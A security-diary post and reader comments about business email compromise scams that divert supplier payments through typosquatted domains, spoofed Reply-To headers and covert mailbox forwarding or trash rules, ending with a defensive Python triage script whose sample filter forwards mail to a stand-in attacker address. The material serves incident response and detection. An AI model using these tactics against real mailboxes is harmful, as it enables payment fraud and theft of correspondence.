A reader sent in details of an incident that is currently being investigated in their environment. (Thank you, Peter, for sharing!) It appears to be a slick yet elaborate scam to divert a customer payment to the scammers. The scammer slips into an existing email conversation between a supplier and its customer and, while staying undetected, redirects an ordinary payment for goods or services into his own coffers. Here is a simple breakdown of the flow:
This scam was averted by security-conscious business staff and properly analyzed by talented tech staff. We appreciate them sharing it with us. Two flags indicate this was elaborate rather than opportunistic: the email appears to have been fully intercepted and targeted, because it referenced the specific payment that had been requested; and the fake domain used in this incident was registered only hours before the fraudulent email containing the account information was sent. The technical analysis showed that the email from the fake domain was sent from an IP address owned by neither the supplier nor the customer. This incident is still under investigation and we will provide more details (suitably obfuscated) as they become available. Please comment and discuss with us if this has happened in your environment, and what was done to mitigate and investigate further.
-Kevin
Kevin Shortt 85 Posts ISC Handler Jan 8th 2014
This was a hijack of an INTERCEPTED legit email? I'd be *REALLY* interested to know how that was done w/o somehow sniffing the network.
Anonymous
Jan 8th 2014
In some cases, the e-mails are "intercepted" by forwarding them to a third party (e.g. by adding forwarding rules to Gmail accounts). This way, the attacker may learn enough about the pending transactions to craft a convincing email.
Johannes 4075 Posts ISC Handler
Jan 8th 2014
This doesn't make any sense. The attacker intercepts the email and alters it ("The Customer receives the email seemingly from the Supplier but altered by the Scammer with the following text slipped into it")... Why would the attacker then go through the trouble of registering a fake domain and sending a second email? The attacker could just insert the whole "scam text" right into the intercepted email. Further, if the attacker is in a position to intercept emails, it seems they would have plenty of access to launch much more sophisticated attacks.
Ryan 2 Posts
Jan 8th 2014
Quoting Johannes: "In some cases, the e-mails are "intercepted" by forwarding them to a third party (e.g. by adding forwarding rules to Gmail accounts). This way, the attacker may learn enough about the pending transactions to craft a convincing email." If that was the case here, the attacker would not be able to have it "altered by the Scammer with the following text slipped into it".
Ryan 2 Posts
Jan 8th 2014
Wouldn't an interception of this kind (prevention of receipt of original e-mail, complete replacement with altered e-mail) indicate a compromise of either the sender or recipient's e-mail servers? Seems to me that this is more than just eavesdropping and spamming an e-mail, otherwise they would have received two e-mails (one altered, one not).
Seems to me that they have bigger problems.
Ryan 1 Posts
Jan 8th 2014
Ryan...
Keep in mind that the investigation is still ongoing. There are various scenarios that can explain why the fake domain was created. The fake domain was to spoof the Supplier. Just because the email chain of the Customer is breached at some level, it does NOT mean full access to all systems is available to the attacker. A fake domain is an easy way for the attacker to get inserted into the communication (with ease), once the trust with the victim gets established. We are hoping others have had some experience with a similar attack, so that any details shared could assist this incident and the general community. Thanks for all comments. It keeps the topic relevant. -Kevin
Kevin Shortt 85 Posts ISC Handler
Jan 8th 2014
Quoting Anonymous: <snip>... I would agree. As they continue to look into it, they are likely to find a breach somewhere. -Kevin
Kevin Shortt 85 Posts ISC Handler
Jan 8th 2014
Hello Kevin,
I saw the very first version of this in the wild in August 2013; it seems to be a new Nigerian 419 variant. All the details you have provided are similar to what I have dealt with in 5+ cases in India. According to my forensic analysis and incident handling, here is how it works:
1> The scammers somehow lure the victims by sending emails with phishing / spear-phishing links.
2> They get their keylogger installed on the PCs of the supplier/customer.
3> They keep a tab on transactions like "shipping", "stuffment", "vehicle number", "Invoice", "DHL Tracking", etc.
4> The scammers then create a fake email identity by registering a similar domain name with a typosquatting trick, which looks almost identical and goes unnoticed by a casual reader.
5> The newly created domain name lies unused as such; however, the FQDN is used to create email IDs which are later used for correspondence with the supplier/customer.
6> An important point is that the TO and CC fields in the email messages, which contain the legitimate email IDs, are also faked and are marked in this process.
7> The body of the email is very poorly drafted in English, with capital letters where they are normally not used, so an easy way to catch it is just to check the semantics and grammar of the email content, e.g. "every starting letter is capitalized".
8> The machines which were infected were managed by a centralized AV monitoring tool, which could not detect this.
9> I myself have worked on 3 of these cases, and I have seen employers sacking their own trusted staff, because they were the only ones who dealt with financial trading information within their respective organizations.
I will try to find some more facts from my cases and, if possible, I will try to provide more insight into it.
We could not obtain a forensically sound image for the cases I handled, because they were identified very late, in December 2013. Another interesting point was that all three of the clients/cases had either the supplier or the customer based in Nigeria/South Africa. All the concerned staff, at either the supplier or customer end, were identified by name, and similar fake email IDs with their names were used for the further chain of mail exchange. I cannot say for sure whether they had compromised the majority of PCs or turned them into botnets; however, this is something almost a year old. Hope this helps someone. Regards, Nitin Kushwaha, CISSP JNCIA.ACA.ACSP.RHCSA.RHCE.CHFI.CEH.SCSECA.ITIL.CIW-SA. CIW-SP.CCP.CLOUDU.CCSA.CCWA.CCLA.CCHA.MCSE.MCSA.MCS.MCP
Kevin Shortt 1 Posts
Jan 8th 2014
This is far simpler than you think.
What took place is an intercept of the outgoing messages from the source, not the customer. The batch was copied off the server by changing the spool directory so it never sends, then used with the new domain from the phishing server, or in some cases the actual server that was compromised, using standard find-and-replace UNIX tools. Sadly, a child can do this.
Al of Your Data Center 80 Posts
Jan 9th 2014
Hi
I am from a web company in Malaysia, designing and hosting (using third-party services, i.e. Hostgator and our local provider) for manufacturers. Recently we have been getting complaints of exactly the nature described in this thread, and I couldn't find any information on email interception.
Scenario 1:
1) Our client (Seller) sends an email to its customer's Yahoo mail (Buyer) with prices.
2) Buyer sends back an acknowledgement email to Seller.
3) Buyer then receives an email from Seller with an attached PDF invoice, IN WHICH THE BANKING DETAILS HAVE BEEN ALTERED to some China bank account.
4) The email header clearly shows it is spoofed and it is NOT from the original sender's server.
5) The "reply to email" field still shows the Seller's email address.
Scenario 2:
1) Another client (Seller) sends an email to its customer's Gmail (Buyer).
2) Along the line, Seller stops receiving replies from Buyer.
3) Seller calls up Buyer; Buyer says he is still responding to Seller's email (WHICH THE SCAMMER HAS TAKEN OVER!).
4) Seller logs into his webmail (he usually uses Outlook) to find a newly added filtering rule to automatically move the Buyer's email to Trash.
Scenario 3:
1) When Seller forwards an email to another account, some random message from China gets attached to the email.
We checked with the local email provider and the normal response is spyware, the password is not strong, or someone internal hacked in. As a web company with a few clients facing the same issue, we do not believe it is some internal job; rather, sophisticated interception is going on, and I believe a lot of companies are facing this problem. Can someone please point me to some websites with a technical explanation of this? I need to answer our clients. Thanks
Al of Your Data Center 1 Posts
Jun 27th 2014
Our company has been the victim of this type of fraud just this week.
I found this ongoing discussion to be exactly what we are facing. Their modified phishy email asking for money to be sent to their bank account is almost identically worded. My questions are:
1) Any update, conclusion and resolution of your investigations you can share?
2) How do I get their bogus spoofed website pulled?
3) Any insight into how the email was intercepted? Other than changing passwords, I'm at a loss as to where the problem occurred.
Al of Your Data Center 1 Posts
Apr 30th 2015
This scam is still ongoing, just happened to a friend of mine and it cost him $11k in funds he sent to a fraudulent account.
Coincidentally, the wording of the scam message included the words "under audit". (A native English speaker would probably say "being audited".) We are now checking to see if someone in the email chain has a compromised email account, with BCC rules set up, etc.
Al of Your Data Center 1 Posts
Aug 24th 2015
A similar incident happened to us. We are in an argument with our supplier, as an email was intercepted and altered, i.e. bank details altered, and we paid into a bogus bank account. We were aware they were setting up a new bank account, and confirmed this with them in a reply, which also went to the bogus email address. Our question is, whose email was intercepted?
The supplier sent it to 2 independent emails; one was altered and was received, and the other, which had been "cc"ed, we later found out had bounced back to the original sender and had been altered. Is there any way we can find out whose email was hacked?
Al of Your Data Center 1 Posts
Nov 21st 2015
I came across the same type of scam very recently. One party was based in India and the other, the supplier, in China. Somehow the scammer came into the two parties' conversation. He then created a similar domain, but on v90.us, and changed the bank account details. The bank account was located in Poland. Unfortunately, our client wasn't very security-conscious and paid about $20k to the bogus account.
-- Anirudh R |
AnirudhR 2 Posts
Nov 23rd 2015
Is there any way to find out what is compromised? The email server, or the user's PC, or what? We have been targeted by this type of scam 3 times in the last 4-5 months, two of which took place within the last week.
AnirudhR 1 Posts
Feb 26th 2016
+1
AnirudhR 1 Posts
Mar 8th 2016
Hey all,
I know this thread is several years old, but I feel it worthwhile to add a compromised situation that I recently encountered. (This thread actually helped secure the email accounts again.)
If you encounter persistent email hijacking or intercepted emails, ** make sure your email auto-forwarding settings are not compromised **. This would apply to the recipients' accounts as well.
What happened to us... One of our email accounts was compromised via a successful phishing attempt. We use G Suite / Gmail for our company mail. The scammer set up mail forwarding on the hacked account, so they had a copy of all correspondence sent to that account. Changing the password on the account (which we did immediately) did nothing, since the forwarding was still in place. Very simple hack, and I spent hours on it until I finally encountered this thread.
Details:
1. We received a request to wire money. This by itself wasn't suspect, as we normally do business via wire payments with our overseas suppliers.
2. They quoted previous emails in the reply. Slipstreamed! This made it seem even more legit.
3. They copied all the details of the email recipient list, formatting and all.
4. The scammer used domain names that were very close to our suppliers'. It was off by 1 letter.
5. Sender email was forged; it was the legit email address. But when you hit Reply, it would use the fake domain (set in the Reply-To field, not visible in Gmail unless you View Original, or actually hit Reply and inspect the email you're replying to).
We almost wired $40,000 the first time. Actually, the wire was submitted, but we were able to cancel it after we realized what happened. The second time, several months later (after changing passwords but not checking the forwarding), it was for a different supplier, but using the exact same tactic. Replies inline with details copied, asking for the wire transfer.
Good luck to all, hope this info helps. - Sushi
Anonymous
Jul 18th 2017
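Added example (not code from the diary or from any of the commenters above): a small Python triage script for the technical signals that recur in this thread. It checks a raw message for a Reply-To domain that differs from the From domain (the G Suite post), for a From or Reply-To domain within a couple of characters of a known supplier domain (the typosquatted domains described in the India and G Suite posts), and for a From that claims the supplier while the connecting IP in the top Received header is outside the supplier's known mail servers (the diary's "IP not owned by the supplier or the customer" and the Malaysian Scenario 1). It also audits a list of Gmail-API-shaped filter rules for forwarding and move-to-Trash actions, the two persistence tricks in Scenario 2 and the G Suite post. The supplier domain, the MTA network, the sample message and the sample filters are all constructed placeholders (RFC 2606 names, RFC 5737 addresses).

```python
"""Triage checks for a suspected payment-diversion email (added example;
all domains, addresses and IPs are hypothetical RFC 2606/5737 values)."""
import re
from email import message_from_string
from email.utils import parseaddr
from ipaddress import ip_address, ip_network

# Assumed allowlist: the real supplier domain and the network its MTAs
# send from (in practice derived from SPF or known-good Received headers).
TRUSTED_SUPPLIER_DOMAINS = {"supplier-example.com"}
TRUSTED_SUPPLIER_NETWORKS = [ip_network("198.51.100.0/24")]

# Constructed sample: From shows the real supplier, Reply-To a lookalike
# domain, and the connecting host is not one of the supplier's MTAs.
SAMPLE_MESSAGE = """\
Received: from mail.supplier-example.com (unknown [203.0.113.45])
\tby mx.customer-example.net with ESMTP id 4Bz7x2; Wed, 8 Jan 2014 10:12:31 +0000
From: Accounts Payable <accounts@supplier-example.com>
Reply-To: Accounts Payable <accounts@suppiler-example.com>
Subject: RE: Invoice 4471 - updated bank details

Our usual account is under audit, please remit to the account below.
"""

# Constructed Gmail-API-shaped filter resources (users.settings.filters):
# one hides a buyer's replies, one forwards transaction-related mail.
SAMPLE_FILTERS = [
    {"id": "f2", "criteria": {"from": "buyer@example.net"},
     "action": {"addLabelIds": ["TRASH"], "removeLabelIds": ["INBOX"]}},
    {"id": "f3", "criteria": {"query": "invoice OR wire OR tracking"},
     "action": {"forward": "drop@attacker.example"}},
]

RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def edit_distance(a, b):
    """Levenshtein distance: insert, delete and substitute each cost 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(domain, trusted, max_dist=2):
    """Trusted domain that `domain` imitates; None if trusted itself or too far."""
    domain = domain.lower()
    if domain in trusted:
        return None
    for t in trusted:
        if edit_distance(domain, t) <= max_dist:
            return t
    return None

def domain_of(header_value):
    """Domain of the first address in a From/Reply-To header ('' if none)."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()

def connecting_ip(msg):
    """Bracketed IP in the top-most (last-added) Received header, or None."""
    received = msg.get_all("Received") or []
    m = RECEIVED_IP.search(received[0]) if received else None
    return ip_address(m.group(1)) if m else None

def triage(raw, trusted_domains, trusted_networks):
    """Findings for one raw RFC 5322 message; an empty list means clean."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    for label, dom in (("From", from_dom), ("Reply-To", reply_dom)):
        target = lookalike_of(dom, trusted_domains) if dom else None
        if target:
            findings.append(f"{label} domain {dom} is a lookalike of {target}")
    ip = connecting_ip(msg)
    if (from_dom in trusted_domains and ip is not None
            and not any(ip in net for net in trusted_networks)):
        findings.append(f"From claims {from_dom} but the mail came from {ip}, "
                        "outside that supplier's known MTAs")
    return findings

def suspicious_filters(filters):
    """Filter rules that forward mail or route it out of the Inbox; these
    survive a password change, which is how the thread's cases stayed hidden."""
    flagged = []
    for f in filters:
        action = f.get("action", {})
        reasons = []
        if action.get("forward"):
            reasons.append("forwards to " + action["forward"])
        if ("TRASH" in action.get("addLabelIds", [])
                or "INBOX" in action.get("removeLabelIds", [])):
            reasons.append("hides mail from the Inbox")
        if reasons:
            flagged.append((f.get("id"), f.get("criteria", {}), reasons))
    return flagged
```

Run `triage()` against the raw source of a suspect message ("View Original" in Gmail) and `suspicious_filters()` against the account's filter list (for Gmail, the output of the API's users.settings.filters.list). A clean triage result is not proof of legitimacy: the Malaysian Scenario 1 had a correct Reply-To and was caught only by the Received headers, and the August 2015 poster confirmed the new account by replying to the very address under the scammer's control, so a change of bank details still needs confirmation through a channel the email itself did not supply.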